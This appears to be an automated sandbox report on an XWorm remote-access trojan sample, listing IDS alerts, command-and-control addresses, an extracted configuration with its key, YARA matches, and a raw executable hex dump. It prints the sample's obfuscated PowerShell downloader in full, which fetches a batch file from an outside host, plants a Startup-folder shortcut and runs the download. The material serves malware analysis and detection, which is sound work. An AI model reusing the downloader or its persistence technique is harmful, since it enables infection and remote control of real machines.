2025-03-07T05:41:25.125459+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:41:27.801166+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:37:46.731670+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:37:58.773239+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:38:10.901002+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:38:23.180994+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:38:35.169313+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:38:45.778732+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:38:48.267135+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:38:56.711168+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:07.882048+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:08.884859+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:09.913496+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:13.961099+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:14.091774+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:14.222539+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:14.347183+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:14.474739+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:14.603023+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:20.090073+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:20.258115+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:20.567779+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:20.893792+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:20.961544+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:21.128847+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:25.135469+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:36.463075+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:46.218931+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:46.346597+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:46.492965+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:56.932459+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:39:57.077167+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:01.072774+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:04.400331+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:07.060892+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:14.241255+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:15.283786+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:22.351910+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:22.478952+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:23.756460+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:32.679113+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:36.881482+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:49.006464+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:40:57.057282+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:41:04.413130+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:41:07.464900+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:41:18.620437+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:41:24.226248+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:41:25.127527+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP
2025-03-07T05:41:27.805615+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP

ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:37:41.170085+0100	2858801	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:39:20.578582+0100	2858799	1	Malware Command and Control Activity Detected	192.168.2.6	49716	185.7.214.108	4411	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:37:22.890339+0100	1810000	2	Potentially Bad Traffic	192.168.2.6	49714	185.7.214.54	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.7.214.54/cmd.bat	Avira URL Cloud: Label: malware
Source: http://185.7.214.54/a.mp4	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["185.7.214.108", "185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: b.ps1

Virustotal: Detection: 8%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 185.7.214.108,185.7.214.54
Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 4411
Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String decryptor: P0WER
Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.7.214.108:4411 -> 192.168.2.6:49716
Source: Network traffic	Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 185.7.214.108:4411 -> 192.168.2.6:49716
Source: Network traffic	Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49716 -> 185.7.214.108:4411
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49716 -> 185.7.214.108:4411
Source: Network traffic	Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49716 -> 185.7.214.108:4411

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.7.214.108
Source: Malware configuration extractor	URLs: 185.7.214.54

Source: global traffic

TCP traffic: 192.168.2.6:49716 -> 185.7.214.108:4411

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 05 Mar 2025 13:01:33 GMTAccept-Ranges: bytesETag: "bf36db8ce8ddb1:0"Server: Microsoft-IIS/10.0Date: Fri, 07 Mar 2025 04:37:25 GMTContent-Length: 329216Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a0 84 96 d1 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 66 04 00 00 9e 00 00 00 00 00 00 c6 84 04 00 00 20 00 00 00 a0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 84 04 00 4f 00 00 00 00 a0 04 00 fc 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 58 84 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 64 04 00 00 20 00 00 00 66 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 fc 9a 00 00 00 a0 04 00 00 9c 00 00 00 68 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 84 04 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 21 00 00 a8 62 04 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 02 2c 0f 20 b8 0b 00 00 28 0f 00 00 0a 28 05 00 00 06 2a 1e 02 28 10 00 00 0a 2a 13 30 06 00 45 00 00 00 01 00 00 11 02 28 11 00 00 0a 0a 28 12 00 00 0a 03 6f 13 00 00 0a 0b 06 8e 69 8d 16 00 00 01 0c 16 0d 2b 13 08 09 06 09 91 07 09 07 8e 69 5d 91 61 d2 9c 09 17 58 0d 09 06 8e 69 32 e7 28 12 00 00 0a 08 6f 14 00 00 0a 2a 1e 02 28 10 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 02 00 00 11 72 01 00 00 70 0a 73 15 00 00 0a 73 16 00 00 0a 0b 07 6f 17 00 00 0a 72 76 58 04 70 7e 01 00 00 04 28 03 00 00 06 6f 18 00 00 0a 26 07 6f 17 00 00 0a 72 98 58 04 70 7e 01 00 00 04 28 03 00 00 06 6f 18 00 00 0a 26 07 17 6f 19 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 03 00 00 06 a2 6f 1a 00 00 0a 6f 1b 00 00 0a 72 c2 58 04 70 7e 01 00 00 04 28 03 00 00 06 6f 1c 00 00 0a 72 e4 58 04 70 7e 01 00 00 04 28 03 00 00 06 6f 1d 00 00 0a 14 14 6f 1e 00 00 0a 26 2a 1e 02 28 10 00 00 0a 2a 1e 17 28 01 00 00 06 2a 1e 02 28 10 00 00 0a 2a 1e 02 28 10 00 00 0a 2a 6a 28 12

Source: global traffic	HTTP traffic detected: GET /a.mp4 HTTP/1.1Host: 185.7.214.54Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fg.exe HTTP/1.1Host: 185.7.214.54

Source: Joe Sandbox View	IP Address: 185.7.214.108 185.7.214.108
Source: Joe Sandbox View	IP Address: 185.7.214.54 185.7.214.54

Source: Joe Sandbox View	ASN Name: DELUNETDE DELUNETDE
Source: Joe Sandbox View	ASN Name: DELUNETDE DELUNETDE

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49714 -> 185.7.214.54:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 185.7.214.54:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49715 -> 185.7.214.54:80

Source: global traffic

HTTP traffic detected: GET /cmd.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 185.7.214.54Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.54

Source: global traffic	HTTP traffic detected: GET /cmd.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 185.7.214.54Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /a.mp4 HTTP/1.1Host: 185.7.214.54Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fg.exe HTTP/1.1Host: 185.7.214.54

Source: powershell.exe, 00000000.00000002.2235596693.0000000004D20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.7.214.54
Source: powershell.exe, 00000000.00000002.2235596693.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235596693.0000000004ECD000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2341315507.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2341358894.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, cmd.bat.0.dr	String found in binary or memory: http://185.7.214.54/a.mp4
Source: powershell.exe, 00000000.00000002.2235596693.0000000004D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235596693.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2243933667.00000000070F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.7.214.54/cmd.bat
Source: powershell.exe, 00000000.00000002.2241293121.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2235596693.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2235596693.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2235596693.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2235596693.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.2241293121.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2241293121.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2241293121.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2235596693.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2241293121.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.csc.exe.4ff46b8.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.csc.exe.4ff46b8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.csc.exe.4ff46b8.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.csc.exe.4ff46b8.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000003.2297360243.0000000004FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000003.2295875521.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.4667563397.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: n1s2ptvo.dll.7.dr, LoadApiName.cs

Large array initialization: Bytes: array initializer size 33280

Found malicious URL file

Source: b.ps1

Initial sample: $t3WkoXyB0F = "QxPhQxPtQxPtQxPpQxP://QxP1QxP8QxP5QxP.QxP7QxP.QxP2QxP1QxP4QxP.QxP5QxP4QxP/QxPcQxPmQxPdQxP.QxPbQxPaQxPtQxP".replace('QxP','')$b2fEePxSZ6 = "ZCZZ:Z\ZWZiZnZdZoZwsZ\ZTeZZmpZ\ZcmZZdZ.ZbZZatZ".replace('Z','')$whMfbSunv3 = "$env:APPDATA\MiZcrZZosofZt\WiZndZowZsZ\StZartZ MeZnuZ\PrZogZraZmsZ\StZZarZtZupZ\ZDZeleZteZAppZ.url".replace('Z','')Invoke-WebRequest -Uri $t3WkoXyB0F -OutFile $b2fEePxSZ6$EcgVO76WVA = @"[InternetShortcut]URL=file:///$b2fEePxSZ6"@.replace('Z','')Set-Content -Path $whMfbSunv3 -Value $EcgVO76WVA -Encoding ASCIIStart-Process -FilePath $b2fEePxSZ6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D681D8	10_2_00D681D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D65510	10_2_00D65510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D6BBD8	10_2_00D6BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D65DE0	10_2_00D65DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D6AE98	10_2_00D6AE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D651C8	10_2_00D651C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00D60BA0	10_2_00D60BA0

Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.csc.exe.4ff46b8.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.csc.exe.4ff46b8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
